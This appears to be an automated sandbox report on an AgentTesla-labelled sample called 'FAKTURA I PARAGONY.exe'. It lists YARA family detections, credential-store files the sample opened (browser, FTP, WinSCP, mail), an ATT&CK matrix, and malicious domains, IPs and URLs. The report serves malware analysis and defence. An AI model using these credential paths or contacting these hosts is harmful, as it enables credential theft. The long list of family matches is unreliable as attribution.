    Yara detected Vidar stealer
    Source: Yara match, File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Predator
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Mimikatz
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected RevengeRAT
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected LaZagne password dumper
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Neshta
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Discord Token Stealer
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected MailPassView
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Parallax RAT
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AgentTesla
    Source: Yara match, File source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR
    Yara detected Valak
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Pony
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Telegram RAT
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Njrat
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Betabot
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AveMaria stealer
    Source: Yara match, File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Nukesped
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Codoso Ghost
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Growtopia
    Source: Yara match, File source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Dorkbot
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Found many strings related to Crypto-Wallets (likely being stolen)
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, String found in binary or memory: \Electrum-LTC\wallets\
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, String found in binary or memory: \ElectronCash\wallets\
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, String found in binary or memory: \Exodus\exodus.wallet\
    Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp, String found in binary or memory: exodus.exe
    Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, String found in binary or memory: !#ALFPER:HSTR:MacOS.Ethereum
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, String found in binary or memory: \Exodus\exodus.wallet\
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, String found in binary or memory: keystore
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, String found in binary or memory: \Electrum-LTC\wallets\
    Tries to steal Mail credentials (via file access)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

    Remote Access Functionality:

    Yara detected Snake Keylogger
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Evrial Stealer
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Mini RAT
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Koadic
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Hancitor
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Meterpreter
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Vidar stealer
    Source: Yara match, File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Predator
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Detected HawkEye Rat
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, String found in binary or memory: HawkEyeKeylogger
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, String found in binary or memory: HawkEyeKeylogger]
    Detected Remcos RAT
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, String found in binary or memory: Remcos_Mutex_Inj
    Yara detected RevengeRAT
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Metasploit Payload
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY
    Yara detected Discord Token Stealer
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Parallax RAT
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AgentTesla
    Source: Yara match, File source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR
    Yara detected Valak
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Detected Nanocore Rat
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
    Yara detected NetWire RAT
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Linux EvilGnome RC5 key
    Source: Yara match, File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Pony
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Detected Imminent RAT
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb
    Yara detected Telegram RAT
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Njrat
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Betabot
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AveMaria stealer
    Source: Yara match, File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Nukesped
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Codoso Ghost
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Growtopia
    Source: Yara match, File source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Dorkbot
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Contains VNC / remote desktop functionality (version string found)
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, String found in binary or memory: RFB 003.008
    Source: Yara match, File source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp, String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
    Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp, String found in binary or memory: cmd=getload&login=
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp, String found in binary or memory: ?cmd=getload&

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Replication Through Removable Media 1 | Windows Management Instrumentation 211 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 11 | OS Credential Dumping 3 | System Time Discovery 1 | Remote Desktop Protocol 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 2
    Default Accounts | Command and Scripting Interpreter 1 | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 1 | Credential API Hooking 1 | Peripheral Device Discovery 1 | Replication Through Removable Media 1 | Data from Local System 3 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 2 | Input Capture 21 | File and Directory Discovery 2 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading 1 | Credentials in Registry 1 | System Information Discovery 116 | Distributed Component Object Model | Credential API Hooking 1 | Scheduled Transfer | Remote Access Software 6 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 11 | LSA Secrets | Query Registry 1 | SSH | Input Capture 21 | Data Transfer Size Limits | Non-Application Layer Protocol 2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 31 | Cached Domain Credentials | Security Software Discovery 441 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 123 | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 351 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Proxy 1 | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | Virtualization/Sandbox Evasion 351 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Users 1 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

    Behavior Graph

    [Behavior graph image not reproduced. Behavior Graph ID: 1622, Sample: FAKTURA I PARAGONY.exe, Startdate: 12/10/2021, Architecture: WINDOWS, Score: 100]

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    FAKTURA I PARAGONY.exe | 45% | Virustotal | | Browse
    FAKTURA I PARAGONY.exe | 27% | ReversingLabs | Win32.Trojan.AgentTesla |

    Dropped Files

    Source | Detection | Scanner | Label | Link
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe | 0% | Metadefender | | Browse
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe | 0% | ReversingLabs | |
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm | 0% | ReversingLabs | |
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm | 0% | ReversingLabs | |
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm | 0% | ReversingLabs | |
    C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm | 0% | ReversingLabs | |

    Unpacked PE Files

    Source | Detection | Scanner | Label | Link | Download
    35.3.MpSigStub.exe.28bd68763ba.143.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62ff37e.139.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c32d4.74.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd7aaa38f.136.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd778bb0d.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c32d4.170.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd76c8116.47.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c283a.76.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd7098dc6.214.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd7098dc6.98.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd6697177.158.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd76c8116.30.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd7098dc6.64.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c283a.171.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd7850ae6.50.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
    35.3.MpSigStub.exe.28bd780418a.59.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c2d87.75.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd780418a.26.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd6694af5.157.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd62c2d87.172.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd77beebe.15.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd76c8116.178.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
    35.3.MpSigStub.exe.28bd77beebe.25.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

    Domains

    Source | Detection | Scanner | Label | Link
    tccinfaes.com | 3% | Virustotal | | Browse
    mail.tccinfaes.com | 11% | Virustotal | | Browse
    x1.i.lencr.org | 0% | Virustotal | | Browse

    URLs


    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    tccinfaes.com | 188.93.227.195 | true | true | | unknown
    drive.google.com | 172.217.168.46 | true | false | | high
    googlehosted.l.googleusercontent.com | 142.250.185.161 | true | false | | high
    mail.tccinfaes.com | unknown | unknown | true | | unknown
    x1.i.lencr.org | unknown | unknown | true | | unknown
    doc-00-88-docs.googleusercontent.com | unknown | unknown | false | | high

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://110.42.4.180: | true | Avira URL Cloud: safe | unknown
    http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg | true | Avira URL Cloud: safe | unknown
    http://tempuri.org/ | true | Avira URL Cloud: safe | unknown
    http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/ | true | Avira URL Cloud: safe | unknown
    http://spywaresoftstop.com/load.php?adv=141 | true | Avira URL Cloud: safe | unknown
    http://masgiO.info/cd/cd.php?id=%s&ver=g | true | Avira URL Cloud: safe | unknown
    http://www.trotux.com/?z= | false | | high
    http://avnisevinc.blogspot.com/ | false | | high

    URLs from Memory and Binaries

                                                unknown
                                                http://82.98.235.MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://verred.net/?1309921MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://pigeonious.com/img/MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://team.afcorp.afg/chr/crt-ho_30/newjflibraryMpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://artishollywoodbikini.blogspot.com/MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://data1.yoou8.com/MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.phpMpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bit.ly/3kthd4jMpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://handjobheats.com/xgi-bin/q.phpMpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.pcpurifier.com/buynow/?MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SETMpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown

                                                    Contacted IPs


                                                    Public

                                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                                    172.217.168.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                    188.93.227.195 | tccinfaes.com | Portugal | 8426 | CLARANET-ASClaraNETLTDGB | true
                                                    142.250.185.161 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:1622
                                                    Start date:12.10.2021
                                                    Start time:16:33:17
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 19m 39s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:FAKTURA I PARAGONY.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                    Run name:Suspected Instruction Hammering
                                                    Number of analysed new started processes analysed:48
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@12/14@4/3
                                                    EGA Information:Failed
                                                    HDC Information:Failed
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.19.171, 52.152.108.96, 40.125.122.151, 20.54.89.15, 40.125.122.176, 52.152.110.14, 20.199.120.151, 20.82.210.154, 92.123.195.50, 92.123.195.73, 2.21.140.114, 8.248.113.254, 67.27.157.126, 67.26.83.254, 8.248.135.254, 8.248.115.254, 20.50.102.62, 104.89.32.83, 209.197.3.8, 104.89.38.104, 2.21.143.74, 2.21.140.235
